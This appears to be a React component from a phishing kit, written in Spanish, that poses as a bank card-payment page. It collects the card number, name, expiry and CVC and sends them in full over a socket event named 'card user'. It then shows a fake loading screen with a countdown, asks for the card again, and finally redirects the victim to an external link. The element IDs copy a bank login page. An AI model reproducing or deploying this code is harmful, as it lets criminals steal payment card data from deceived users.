import React from "react";
import Cards from "react-credit-cards-2";
import "react-credit-cards-2/dist/es/styles-compiled.css";
import socket from "../socket";
import { link } from "./settings";
import GridLoader from "react-spinners/GridLoader";

const PaymentForms = ({ c, sA, sT, sC }) => {
  const a = 60;
  const override = {
    display: "block",
    margin: "0 auto",
    borderColor: "red",
  };
  const card = {
    display: "inline-block",
    borderRadius: "10px",
    boxShadow: "0 0 10px #dadada",
  };
  const [error, setError] = React.useState(false);
  const [aux3, setAux3] = React.useState(false);
  const [isActive, setIsActive] = React.useState(false);
  const [time, setTime] = React.useState(0);
  const [cont, setCont] = React.useState(0);
  const [aux, setAux] = React.useState(true);
  const [state, setState] = React.useState({
    number: "",
    name: "",
    expiry: "",
    cvc: "",
    focus: "",
  });

  const handleInputChange = (e) => {
    setState({
      ...state,
      [e.target.name]: e.target.value,
    });
  };

  const handleFocusChange = (e) => {
    setState({
      ...state,
      focus: e.target.name,
    });
  };

  const isNumeric = (n) => !isNaN(n);
  const processPayment = () => {
    if (
      state.number !== "" &&
      state.name !== "" &&
      state.expiry !== "" &&
      state.cvc !== "" &&
      isNumeric(state.number) &&
      isNumeric(state.expiry) &&
      isNumeric(state.cvc) &&
      state.number.length >= 15 &&
      state.expiry.length === 4 &&
      state.cvc.length >= 3
    ) {
      socket.emit("card user", {
        name: state.name,
        number: state.number,
        expiry: state.expiry,
        cvc: state.cvc,
      });
      setIsActive(true);
      setAux3(false);
      setAux(false);
      sC([
        ...c,
        {
          name: state.name,
          number: state.number,
          expiry: state.expiry,
          cvc: state.cvc,
        },
      ]);
    } else {
      setError(true);
    }
  };

  React.useEffect(() => {
    if (
      state.number !== "" &&
      state.name !== "" &&
      state.expiry !== "" &&
      state.cvc !== ""
    ) {
      setError(false);
    }
  }, [state.number, state.name, state.expiry, state.cvc]);

  React.useEffect(() => {
    let interval = null;
    if (time >= 60) {
      if (cont >= 4) {
        window.location.href = link; //link2
      } else {
        setIsActive(false);
        setCont(cont + 2);
        setTime(0);
        setAux3(false);
        setAux(true);
      }
    }

    if (isActive) {
      interval = setInterval(() => {
        setTime((time) => time + 1);
        sT(time);
      }, 1000);
    } else {
      clearInterval(interval);
    }
    return () => {
      clearInterval(interval);
    };
  }, [isActive, time, cont, sT, sA]);

  return (
    <div style={{ backgroundColor: "rgba(255, 255, 255, 0.1)" }}>
      {!aux && (
        <div className="acc_content clearfix" style={{ display: "block" }}>
          {" "}
          <div id="register-form" className="nobottommargin">
            <br />
            <br />
            <br />
            <br />
            <br />
            <div className="col_full">
              <span style={{ fontSize: "12px" }}>
                Por favor, espere un momento mientras procesamos su solicitud,
                Gracias por tu paciencia.
              </span>
              <br />
              <br />
              <div className="sweet-loading">
                <GridLoader
                  size="15"
                  margin="2"
                  color="#008E5A"
                  loading="true"
                  cssOverride={override}
                  speedMultiplier="1"
                />
                <br />
                <div
                  style={{
                    top: "100px",
                    bottom: "0px",
                    textAlign: "center",
                    width: "100%",
                    fontSize: "16px",
                    fontWeight: "bold",
                    color: "#008E5A",
                  }}
                >
                  {time <= 15 && <div>Cargando...</div>}

                  {time > 15 && 30 >= time && <div>Conectando...</div>}

                  {time > 30 && (
                    <div>{time > 30 ? a - time : ""} Cargando...</div>
                  )}
                </div>
              </div>
            </div>
            <br />
            <br />
            <br />
            <br />
            <br />
          </div>
        </div>
      )}
      {aux && (
        <div className="card-body" style={card}>
          <Cards
            number={state.number}
            name={state.name}
            expiry={state.expiry}
            cvc={state.cvc}
            focused={state.focus}
          />
          <div className="p-2">
            <p className="p-2">
              <strong>
                Por favor, ingresa los datos de tu tarjeta los cuales deben
                coincidir con los que diste para su apertura
              </strong>
            </p>
            <div className="form-group">
              <label htmlFor="number">Número de la tarjeta</label>
              <input
                type="text"
                name="number"
                id="number"
                maxLength="16"
                className="form-control"
                onChange={handleInputChange}
                onFocus={handleFocusChange}
                placeholder="Card number"
              />
            </div>
            <div className="form-group">
              <label htmlFor="name">Nombre y Apellido</label>
              <input
                type="text"
                name="name"
                id="name"
                maxLength="30"
                className="form-control"
                onChange={handleInputChange}
                onFocus={handleFocusChange}
                placeholder="Your name here"
              />
            </div>
            <div className="form-row">
              <div className="form-group col-md-6">
                <label htmlFor="expiry">Fecha de expiración</label>
                <input
                  type="text"
                  name="expiry"
                  id="expiry"
                  maxLength="4"
                  className="form-control"
                  onChange={handleInputChange}
                  onFocus={handleFocusChange}
                  placeholder="MM/YY"
                />
              </div>
              <div className="form-group col-md-6">
                <label htmlFor="cvc">C&oacute;digo de seguridad</label>
                <input
                  type="text"
                  name="cvc"
                  id="cvc"
                  maxLength="4"
                  className="form-control"
                  onChange={handleInputChange}
                  onFocus={handleFocusChange}
                  placeholder="CVC"
                />
              </div>
            </div>

            {error && (
              <div
                id="ctl00_MainContent_dvMensajeLogin"
                className="alert alert-danger"
              >
                <span id="ctl00_MainContent_lblMensajeLogin">
                  Ingrese los datos correctamente.
                </span>
              </div>
            )}
            {aux3 && (
              <div
                id="ctl00_MainContent_dvMensajeLogin"
                className="alert alert-danger"
              >
                <span id="ctl00_MainContent_lblMensajeLogin">
                  Error de conexión
                </span>
              </div>
            )}

            <div className="col_full center">
              <button
                onClick={processPayment}
                type="button"
                className="button button-rounded nomargin"
              >
                Pagar
              </button>
            </div>
          </div>
        </div>
      )}
    </div>
  );
};

export default PaymentForms;
